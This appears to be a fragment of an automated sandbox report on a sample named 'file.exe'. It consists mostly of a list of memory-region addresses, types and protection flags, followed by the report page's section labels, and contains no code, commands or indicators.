page read and write

26B7735D000

trusted library allocation

page read and write

56FE000

stack

page read and write

26B76CBD000

trusted library allocation

page read and write

26B78223000

trusted library allocation

page read and write

2681000

trusted library allocation

page read and write

26B76AC1000

trusted library allocation

page read and write

803ADAE000

stack

page read and write

26B77428000

trusted library allocation

page read and write

E5E000

stack

page read and write

7FFAACBC4000

trusted library allocation

page read and write

803C1FE000

stack

page read and write

7F0000

heap

page read and write

26B781DA000

trusted library allocation

page read and write

A10000

trusted library allocation

page read and write

244F0740000

heap

page read and write

26B76B9B000

trusted library allocation

page read and write

26B66BE3000

trusted library allocation

page read and write

26B76C2D000

trusted library allocation

page read and write

26B66BC5000

trusted library allocation

page read and write

51FE000

stack

page read and write

39C000

stack

page read and write

7FFB1D556000

unkown

page readonly

26B76B84000

trusted library allocation

page read and write

260012B2000

heap

page read and write

26B78162000

trusted library allocation

page read and write

BF90CFB000

stack

page read and write

26B7F300000

heap

page read and write

26B77228000

trusted library allocation

page read and write

26B781EF000

trusted library allocation

page read and write

E6D8F9C000

stack

page read and write

26B76CCE000

trusted library allocation

page read and write

26B670A2000

trusted library allocation

page read and write

26B66DA9000

trusted library allocation

page read and write

26B64E42000

heap

page read and write

9D4000

trusted library allocation

page read and write

26B66DAD000

trusted library allocation

page read and write

26B773F2000

trusted library allocation

page read and write

26B66E78000

trusted library allocation

page read and write

7FFAACDD0000

trusted library allocation

page read and write

1073A22A000

heap

page read and write

26B66FBD000

trusted library allocation

page read and write

26B77433000

trusted library allocation

page read and write

7FFAACC1C000

trusted library allocation

page execute and read and write

26B77ADB000

trusted library allocation

page read and write

E6D92FF000

stack

page read and write

26B66F9D000

trusted library allocation

page read and write

7FFAACDC0000

trusted library allocation

page read and write

26B771DF000

trusted library allocation

page read and write

1073A1B0000

heap

page read and write

7FFAACBED000

trusted library allocation

page execute and read and write

1E8DAE1A000

heap

page read and write

27091F5B000

heap

page read and write

26B772FD000

trusted library allocation

page read and write

26B77231000

trusted library allocation

page read and write

26B77353000

trusted library allocation

page read and write

27091F74000

heap

page read and write

26001430000

heap

page read and write

26B65060000

heap

page read and write

803B7FE000

stack

page read and write

BF90EFF000

stack

page read and write

543E000

stack

page read and write

4F10000

heap

page read and write

26B66E65000

trusted library allocation

page read and write

26B7F304000

heap

page read and write

26B7897D000

trusted library allocation

page read and write

29EA7C000

stack

page read and write

26B77202000

trusted library allocation

page read and write

26B66D8D000

trusted library allocation

page read and write

7FFB1D541000

unkown

page execute read

26B66F99000

trusted library allocation

page read and write

26B76B91000

trusted library allocation

page read and write

7FFAACBDD000

trusted library allocation

page execute and read and write

803BFFC000

stack

page read and write

26B66D81000

trusted library allocation

page read and write

26B66B98000

trusted library allocation

page read and write

7FE000

heap

page read and write

832000

heap

page read and write

803BCFC000

stack

page read and write

26B7819F000

trusted library allocation

page read and write

26B66BA1000

trusted library allocation

page read and write

26B76B8A000

trusted library allocation

page read and write

1073A1D5000

heap

page read and write

803BBFD000

stack

page read and write

26B64C30000

unkown

page readonly

26B781A7000

trusted library allocation

page read and write

26B7720F000

trusted library allocation

page read and write

26B76D6E000

trusted library allocation

page read and write

238D1D58000

heap

page read and write

2B2000

unkown

page readonly

9FB000

trusted library allocation

page execute and read and write

1E8DACC0000

heap

page read and write

238D20D5000

heap

page read and write

26B77333000

trusted library allocation

page read and write

26B77313000

trusted library allocation

page read and write

26B00733000

heap

page read and write

7FFAACD69000

trusted library allocation

page read and write

26B66BB8000

trusted library allocation

page read and write

26B783D3000

trusted library allocation

page read and write

4EF0000

heap

page read and write

26B64E10000

heap

page read and write

26B76AEA000

trusted library allocation

page read and write

2600126B000

heap

page read and write

803AD6F000

stack

page read and write

C8E000

stack

page read and write

238D1D5A000

heap

page read and write

26B76C42000

trusted library allocation

page read and write

26B7726A000

trusted library allocation

page read and write

2600129E000

heap

page read and write

26B66BD8000

trusted library allocation

page read and write

700000

heap

page read and write

803C0FB000

stack

page read and write

26B00500000

heap

page read and write

26B782D3000

trusted library allocation

page read and write

26B66BA3000

trusted library allocation

page read and write

26B64F10000

heap

page read and write

825000

heap

page read and write

26B76BAE000

trusted library allocation

page read and write

1E8DAE18000

heap

page read and write

244F0820000

heap

page read and write

26B76BA6000

trusted library allocation

page read and write

A60000

trusted library allocation

page execute and read and write

1073A1D0000

heap

page read and write

26B64DFA000

heap

page read and write

26B77270000

trusted library allocation

page read and write

26B784BD000

trusted library allocation

page read and write

26B66B41000

trusted library allocation

page read and write

7FFAACBE4000

trusted library allocation

page read and write

4AD0000

heap

page read and write

27091F10000

heap

page read and write

26B66DEC000

trusted library allocation

page read and write

7FFAACCE0000

trusted library allocation

page execute and read and write

26B76D45000

trusted library allocation

page read and write

26B7815E000

trusted library allocation

page read and write

501E000

stack

page read and write

26B771C6000

trusted library allocation

page read and write

26B66B9F000

trusted library allocation

page read and write

26B76C9E000

trusted library allocation

page read and write

803B0ED000

stack

page read and write

26B781BA000

trusted library allocation

page read and write

26B64DD0000

heap

page read and write

238D1CA0000

heap

page read and write

557E000

stack

page read and write

26B64DD6000

heap

page read and write

26B66C3F000

trusted library allocation

page read and write

238D1C90000

heap

page read and write

26B66BD2000

trusted library allocation

page read and write

244F2210000

heap

page read and write

26B65065000

heap

page read and write

7FFB1D562000

unkown

page readonly

26B77B13000

trusted library allocation

page read and write

477E000

stack

page read and write

238D20D0000

heap

page read and write

26B77C73000

trusted library allocation

page read and write

29EAFE000

stack

page read and write

26B7721A000

trusted library allocation

page read and write

26B78167000

trusted library allocation

page read and write

7FFB1D565000

unkown

page readonly

26B66BDA000

trusted library allocation

page read and write

26B6709B000

trusted library allocation

page read and write

26B6690C000

heap

page read and write

1E8DAFA0000

heap

page read and write

26B77B48000

trusted library allocation

page read and write

26B77278000

trusted library allocation

page read and write

26B6685F000

heap

page read and write

803C2FD000

stack

page read and write

26B66B9D000

trusted library allocation

page read and write

26B66C18000

trusted library allocation

page read and write

803B9FD000

stack

page read and write

26B77BB2000

trusted library allocation

page read and write

26B76ADA000

trusted library allocation

page read and write

26001287000

heap

page read and write

52FE000

stack

page read and write

238D1D50000

heap

page read and write

26B66C0B000

trusted library allocation

page read and write

26B76C4E000

trusted library allocation

page read and write

26B771D7000

trusted library allocation

page read and write

26B66C3C000

trusted library allocation

page read and write

26B64DDC000

heap

page read and write

57FF000

stack

page read and write

26001220000

heap

page read and write

7FFAACDA0000

trusted library allocation

page execute and read and write

1E8DAE10000

heap

page read and write

26B77AD3000

trusted library allocation

page read and write

803B8FE000

stack

page read and write

26B7731B000

trusted library allocation

page read and write

27091F50000

heap

page read and write

9C3000

trusted library allocation

page execute and read and write

26B67122000

trusted library allocation

page read and write

260011B0000

heap

page read and write

26B66810000

heap

page read and write

27092120000

heap

page read and write

E70000

heap

page read and write

26B66819000

heap

page read and write

26B7820F000

trusted library allocation

page read and write

6F9000

stack

page read and write

26B76CF6000

trusted library allocation

page read and write

26B66E68000

trusted library allocation

page read and write

26B76C03000

trusted library allocation

page read and write

26B76C3C000

trusted library allocation

page read and write

26B64E3C000

heap

page read and write

26B66C25000

trusted library allocation

page read and write

1073A228000

heap

page read and write

26B67083000

trusted library allocation

page read and write

26B77A5D000

trusted library allocation

page read and write

26B76CD6000

trusted library allocation

page read and write

27091F7B000

heap

page read and write

26B76C54000

trusted library allocation

page read and write

26B77CBD000

trusted library allocation

page read and write

26B7733D000

trusted library allocation

page read and write

26B76D66000

trusted library allocation

page read and write

26B76C5D000

trusted library allocation

page read and write

2530000

heap

page read and write

26B66B4C000

trusted library allocation

page read and write

7FFAACBC2000

trusted library allocation

page read and write

26B66E8F000

trusted library allocation

page read and write

26B66DBA000

trusted library allocation

page read and write

26B66BC9000

trusted library allocation

page read and write

260011A0000

heap

page read and write

7F8000

heap

page read and write

26B771A4000

trusted library allocation

page read and write

26001285000

heap

page read and write

803C5FE000

stack

page read and write

26B66910000

heap

page read and write

7FFAACBEB000

trusted library allocation

page execute and read and write

26B76C96000

trusted library allocation

page read and write

BF90DFE000

unkown

page read and write

26B66E88000

trusted library allocation

page read and write

803B2FF000

stack

page read and write

1AB2A7C000

stack

page read and write

26B77ABD000

trusted library allocation

page read and write

26B77289000

trusted library allocation

page read and write

A80000

heap

page read and write

26B76AD0000

trusted library allocation

page read and write

26B66BF6000

trusted library allocation

page read and write

1AB2AFF000

stack

page read and write

26B77AE8000

trusted library allocation

page read and write

803B5FE000

stack

page read and write

26B76BA9000

trusted library allocation

page read and write

9D0000

trusted library allocation

page read and write

26B783B2000

trusted library allocation

page read and write

26001260000

heap

page read and write

26B77207000

trusted library allocation

page read and write

1E8DADA0000

heap

page read and write

26B771FA000

trusted library allocation

page read and write

26B64EF0000

heap

page read and write

26B7F310000

heap

page execute and read and write

26B77AFD000

trusted library allocation

page read and write

26B782F3000

trusted library allocation

page read and write

There are 498 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
file.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportfile.exe

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
file.exe